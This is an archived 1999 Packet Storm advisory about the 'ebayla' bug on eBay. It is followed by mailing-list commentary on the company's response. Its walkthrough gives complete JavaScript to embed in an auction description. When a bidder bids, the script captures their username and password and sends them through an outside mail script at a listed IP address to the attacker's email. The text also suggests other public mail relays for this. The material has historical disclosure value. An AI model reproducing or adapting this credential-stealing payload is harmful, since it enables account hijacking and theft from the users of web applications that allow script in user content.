ebayla.txt
Posted Aug 17, 1999

Security hole in EBay's on-line auction web site software allows attacker to completely hijack your account(s). Full exploit description and code included. EBay solution: None (they apparently don't give a damn). Viable solution: stop using EBay.

tags | exploit, web
MD5 | 9e88df858dfa442018841d06f235ea03

http://www.because-we-can.com/ebayla/

THE EBAYLA BUG AND HOW TO PROTECT YOURSELF

This page describes a security problem that Blue Adept
<http://www.because-we-can.com/>
discovered with eBay's <http://www.ebay.com/>
on-line auctions on March 31,
1999 (realaudio interview).
<http://stream.internet.com/Content/inr19990412.ram>
The security hole allows eBay
users to easily steal the passwords of other eBay users.
The exploit involves posting items for bid that include
malicious javascript code as part of the item's description.
When an unsuspecting eBay user places a bid on the
item, the embedded javascript code sends their username
and password to the malicious user by e-mail. From the
victim's point of view, nothing unusual seems to have
occurred, so they are unlikely to report or complain to eBay.

Once a malicious user knows the username/password of the
victim's eBay account, she can assume full control
of the account, including the ability to:

create new auctions (automatically charging the victim's account),
place bids in the victim's name,
retract legitimate bids in the victim's name,
change the victim's username/password, barring them from eBay,
associate bogus negative/positive comments with an arbitrary seller,
prematurely close an auction being run by the victim,
insert the ebayla code into the victim's auction.
(The code could be altered to do this automatically, which would
constitute an ebayla virus.)

The security problem is dangerously easy to take advantage of. A
malicious user needs only to embed the javascript code into their
description of an item for auction. A walk-through of the exploit
demonstrates step-by-step how any user can steal eBay passwords. [1]

Blue Adept notified eBay that a 'huge' potential security problem
existed on March 31,1999 and offered assistance (but as of April 18,
1999 has only received form letter KMM798062C0KM in reply).
Information about the ebayla exploit is being made publicly available to
speed the process of fixing the security hole.

TRY THE EBAYLA BUG DEMO ON YOURSELF!

Visit a working demonstration of this exploit at eBay! The demo
works with any javascript-enabled browser, such as Netscape or
Internet Explorer. Users must register (free) with eBay to place bids.
<http://pages.ebay.com/aw/registration-show.html>

The demo is Blue Adept's own auction infected with eBayla code.
<http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?ViewItem&item=92085423>
WARNING! When you bid on this item (or even just review your bid
without placing it), your username and password will automatically
be mailed back to because-we-can.com.


HOW TO PROTECT YOURSELF

Unfortunately, the potential security issues at eBay are difficult
to spot and avoid. If you are unfamiliar with spotting suspect
javascript in the docsource of an html document, the best way to
protect yourself may be to avoid using eBay until adequate html
filters have been implemented.

-----------------------------------------------------------------------------

[1] http://www.because-we-can.com/ebayla/walk.htm

THE EBAYLA BUG WALK-THROUGH

This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal
usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely
available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate
that using only the items listed below, a malicious user can acquire eBay usernames and passwords. (To see a
more efficient (2 line) version of the code that uses a Perl script, visit the live demo at eBay.)

INGREDIENTS:

1 Computer with Internet Access
1 email account

STEP 1:
Visit ebay.com and register for a free user account.
<http://pages.ebay.com/aw/registration-show.html>

STEP 2:
Go to the seller's area to post an item for auction. When asked to enter the description of the item, post the
following description, containing the ebayla code. The first line of the script indicates the email address to which
usernames/passwords are to be sent.
<http://pages.ebay.com/aw/newitem.html>

1 car, comes with windows. crashes frequently. toy.<hr>

WARNING do not bid on this item!! This auction is a demonstration of the
<a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.
If you place/review a bid, your username and password will be mailed to
http://www.because-we-can.com.


<script>
recipient = "blue_adept@because-we-can.com";

function printframeset(place_bid, mailUrl, username, password){
document.open();
document.writeln('<script>');
document.writeln('function go(){');
document.writeln('top.b.document.open();');
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
document.writeln('top.b.document.writeln("</form>")');
document.writeln('top.b.document.close();');
document.writeln('}');
document.writeln('</scr' + 'ipt>');
document.writeln('</head>');
document.writeln('<frameset rows="100%,*" onLoad="go()">');
document.writeln('<frame name="t" src="' + place_bid + '">');
document.writeln('<frame name="b" src="">');
document.writeln('</frameset>');
document.close();
}

function urlEncode(inStr) {
outStr=' '; //not '' for a NS bug!
for (i=0; i < inStr.length; i++) {
aChar=inStr.substring (i, i+1);
switch(aChar){
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;
case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;
case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;
case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;
case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;
case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;
case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;
case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;
case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;
case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;
default: outStr += aChar;
}
}
return outStr.substring(1, outStr.length);
}

function newaction(){
window.document.forms[0].action="javascript:ebayla()";
}

function ebayla(){
item = urlEncode(window.document.forms[0].item.value);
username = urlEncode(window.document.forms[0].userid.value);
password = urlEncode(window.document.forms[0].pass.value);
maxbid = urlEncode(window.document.forms[0].maxbid.value);

bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";
bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username
+ "&pass=" + password + "&maxbid=" + maxbid;
place_bid = bid_script + bid_query_string;

mailscript = "http://204.225.88.132/cgi-bin/form1";
mailUrl = mailscript + '?|' + recipient;
printframeset(place_bid, mailUrl, username, password);
}

if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){
setTimeout("newaction()", 1000);
}

</script>


STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message
that contains the user's username and password.

Note:
In the exploit described above, the part of the program that does the
actual "dirty-work" of mailing the password and username is a
randomly chosen server-side mailing script we found on the web.
There are many equivalent and publicly available server-side mailing
programs that can be used in its place.
<http://www.altavista.com/cgi-bin/query?pg=aq&kl=XX&r=%22feedback+form%22+%7C+%22mail+form%22&search=Search&q=&d0=&d1=>

-----------------------------------------------------------------------------

Date: Mon, 19 Apr 1999 14:11:50 -0700
From: "Epstein, Jeremy" <Jeremy_Epstein@NAI.com>
Subject: Another old-fashioned bug comes back to byte

Wired reports in "'EBayla' Bug Strikes eBay" (see
http://www.wired.com/news/news/technology/story/19207.html) that eBay users
can enter an HTML description of the item being auctioned. However, the
script provided by the seller can also include Javascript, thus allowing the
seller to create a fairly simple web page that, when accessed by the
unsuspecting bidder, can capture the bidder's eBay username and password and
send it to the bidder (or anyone else).

This is a new version of an old bug: if you allow users to specify input
that can be used by others, make sure there's enough filtering that it can't
be harmful.

Perhaps the scariest part was the reaction from eBay, as reported by Wired:
"EBay's senior director of corporate communications characterized the hole
as an 'occasional byproduct' of the service's user-focused design." eBay
downplayed the severity of the exploit, noting that "If somebody had indeed
used your password as well as your username and started bidding on a bunch
of items, you'd be the first person to be contacted by eBay through e-mail,
and we'd be able to backtrack on that to make sure that we could take care
of that situation."

Gee thanks. After it happens, you'll let me know I just bought a velvet
Elvis and a set of matching pink lawn flamingos :-)

-----------------------------------------------------------------------------

Date: Wed, 21 Apr 1999 17:45:47 -0700
From: Paul Festa <paulf@CNET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: eBay password stealing with JavaScript

They say they won't:

http://www.news.com/News/Item/0,4,35321,00.html

>>>eBay acknowledged that the JavaScript exploit works, but minimized its
importance.

"We know it's there, but you have to put it all in perspective," said eBay
spokesman Kevin Pursglove. "We have a very open environment that lets
individuals describe what they're selling, and JavaScript is there so
people can make the best of their abilities to describe an item."<<<

At 08:30 PM 4/20/99 -0600, Michael K. Sanders wrote:
>Since 'e-commerce' was discussed recently and I didn't find this in
>the archives, may I direct your attention to:
>
><URL:http://because-we-can.com/ebayla/default.htm>
>
>It will be interesting if eBay tries to 'filter' JavaScript from their
>listings to fix this.
>
>
Paul Festa
reporter, CNET News.com
(415) 395-7805 ext. 1313

www.news.com
"Silicon Valley's leading source of up-to-the-minute
information about the technology business." --New York Times

www.cnet.com
"A thing called CNET, which is an industry thing." --Bill Gates

© 2012 Packet Storm. All rights reserved.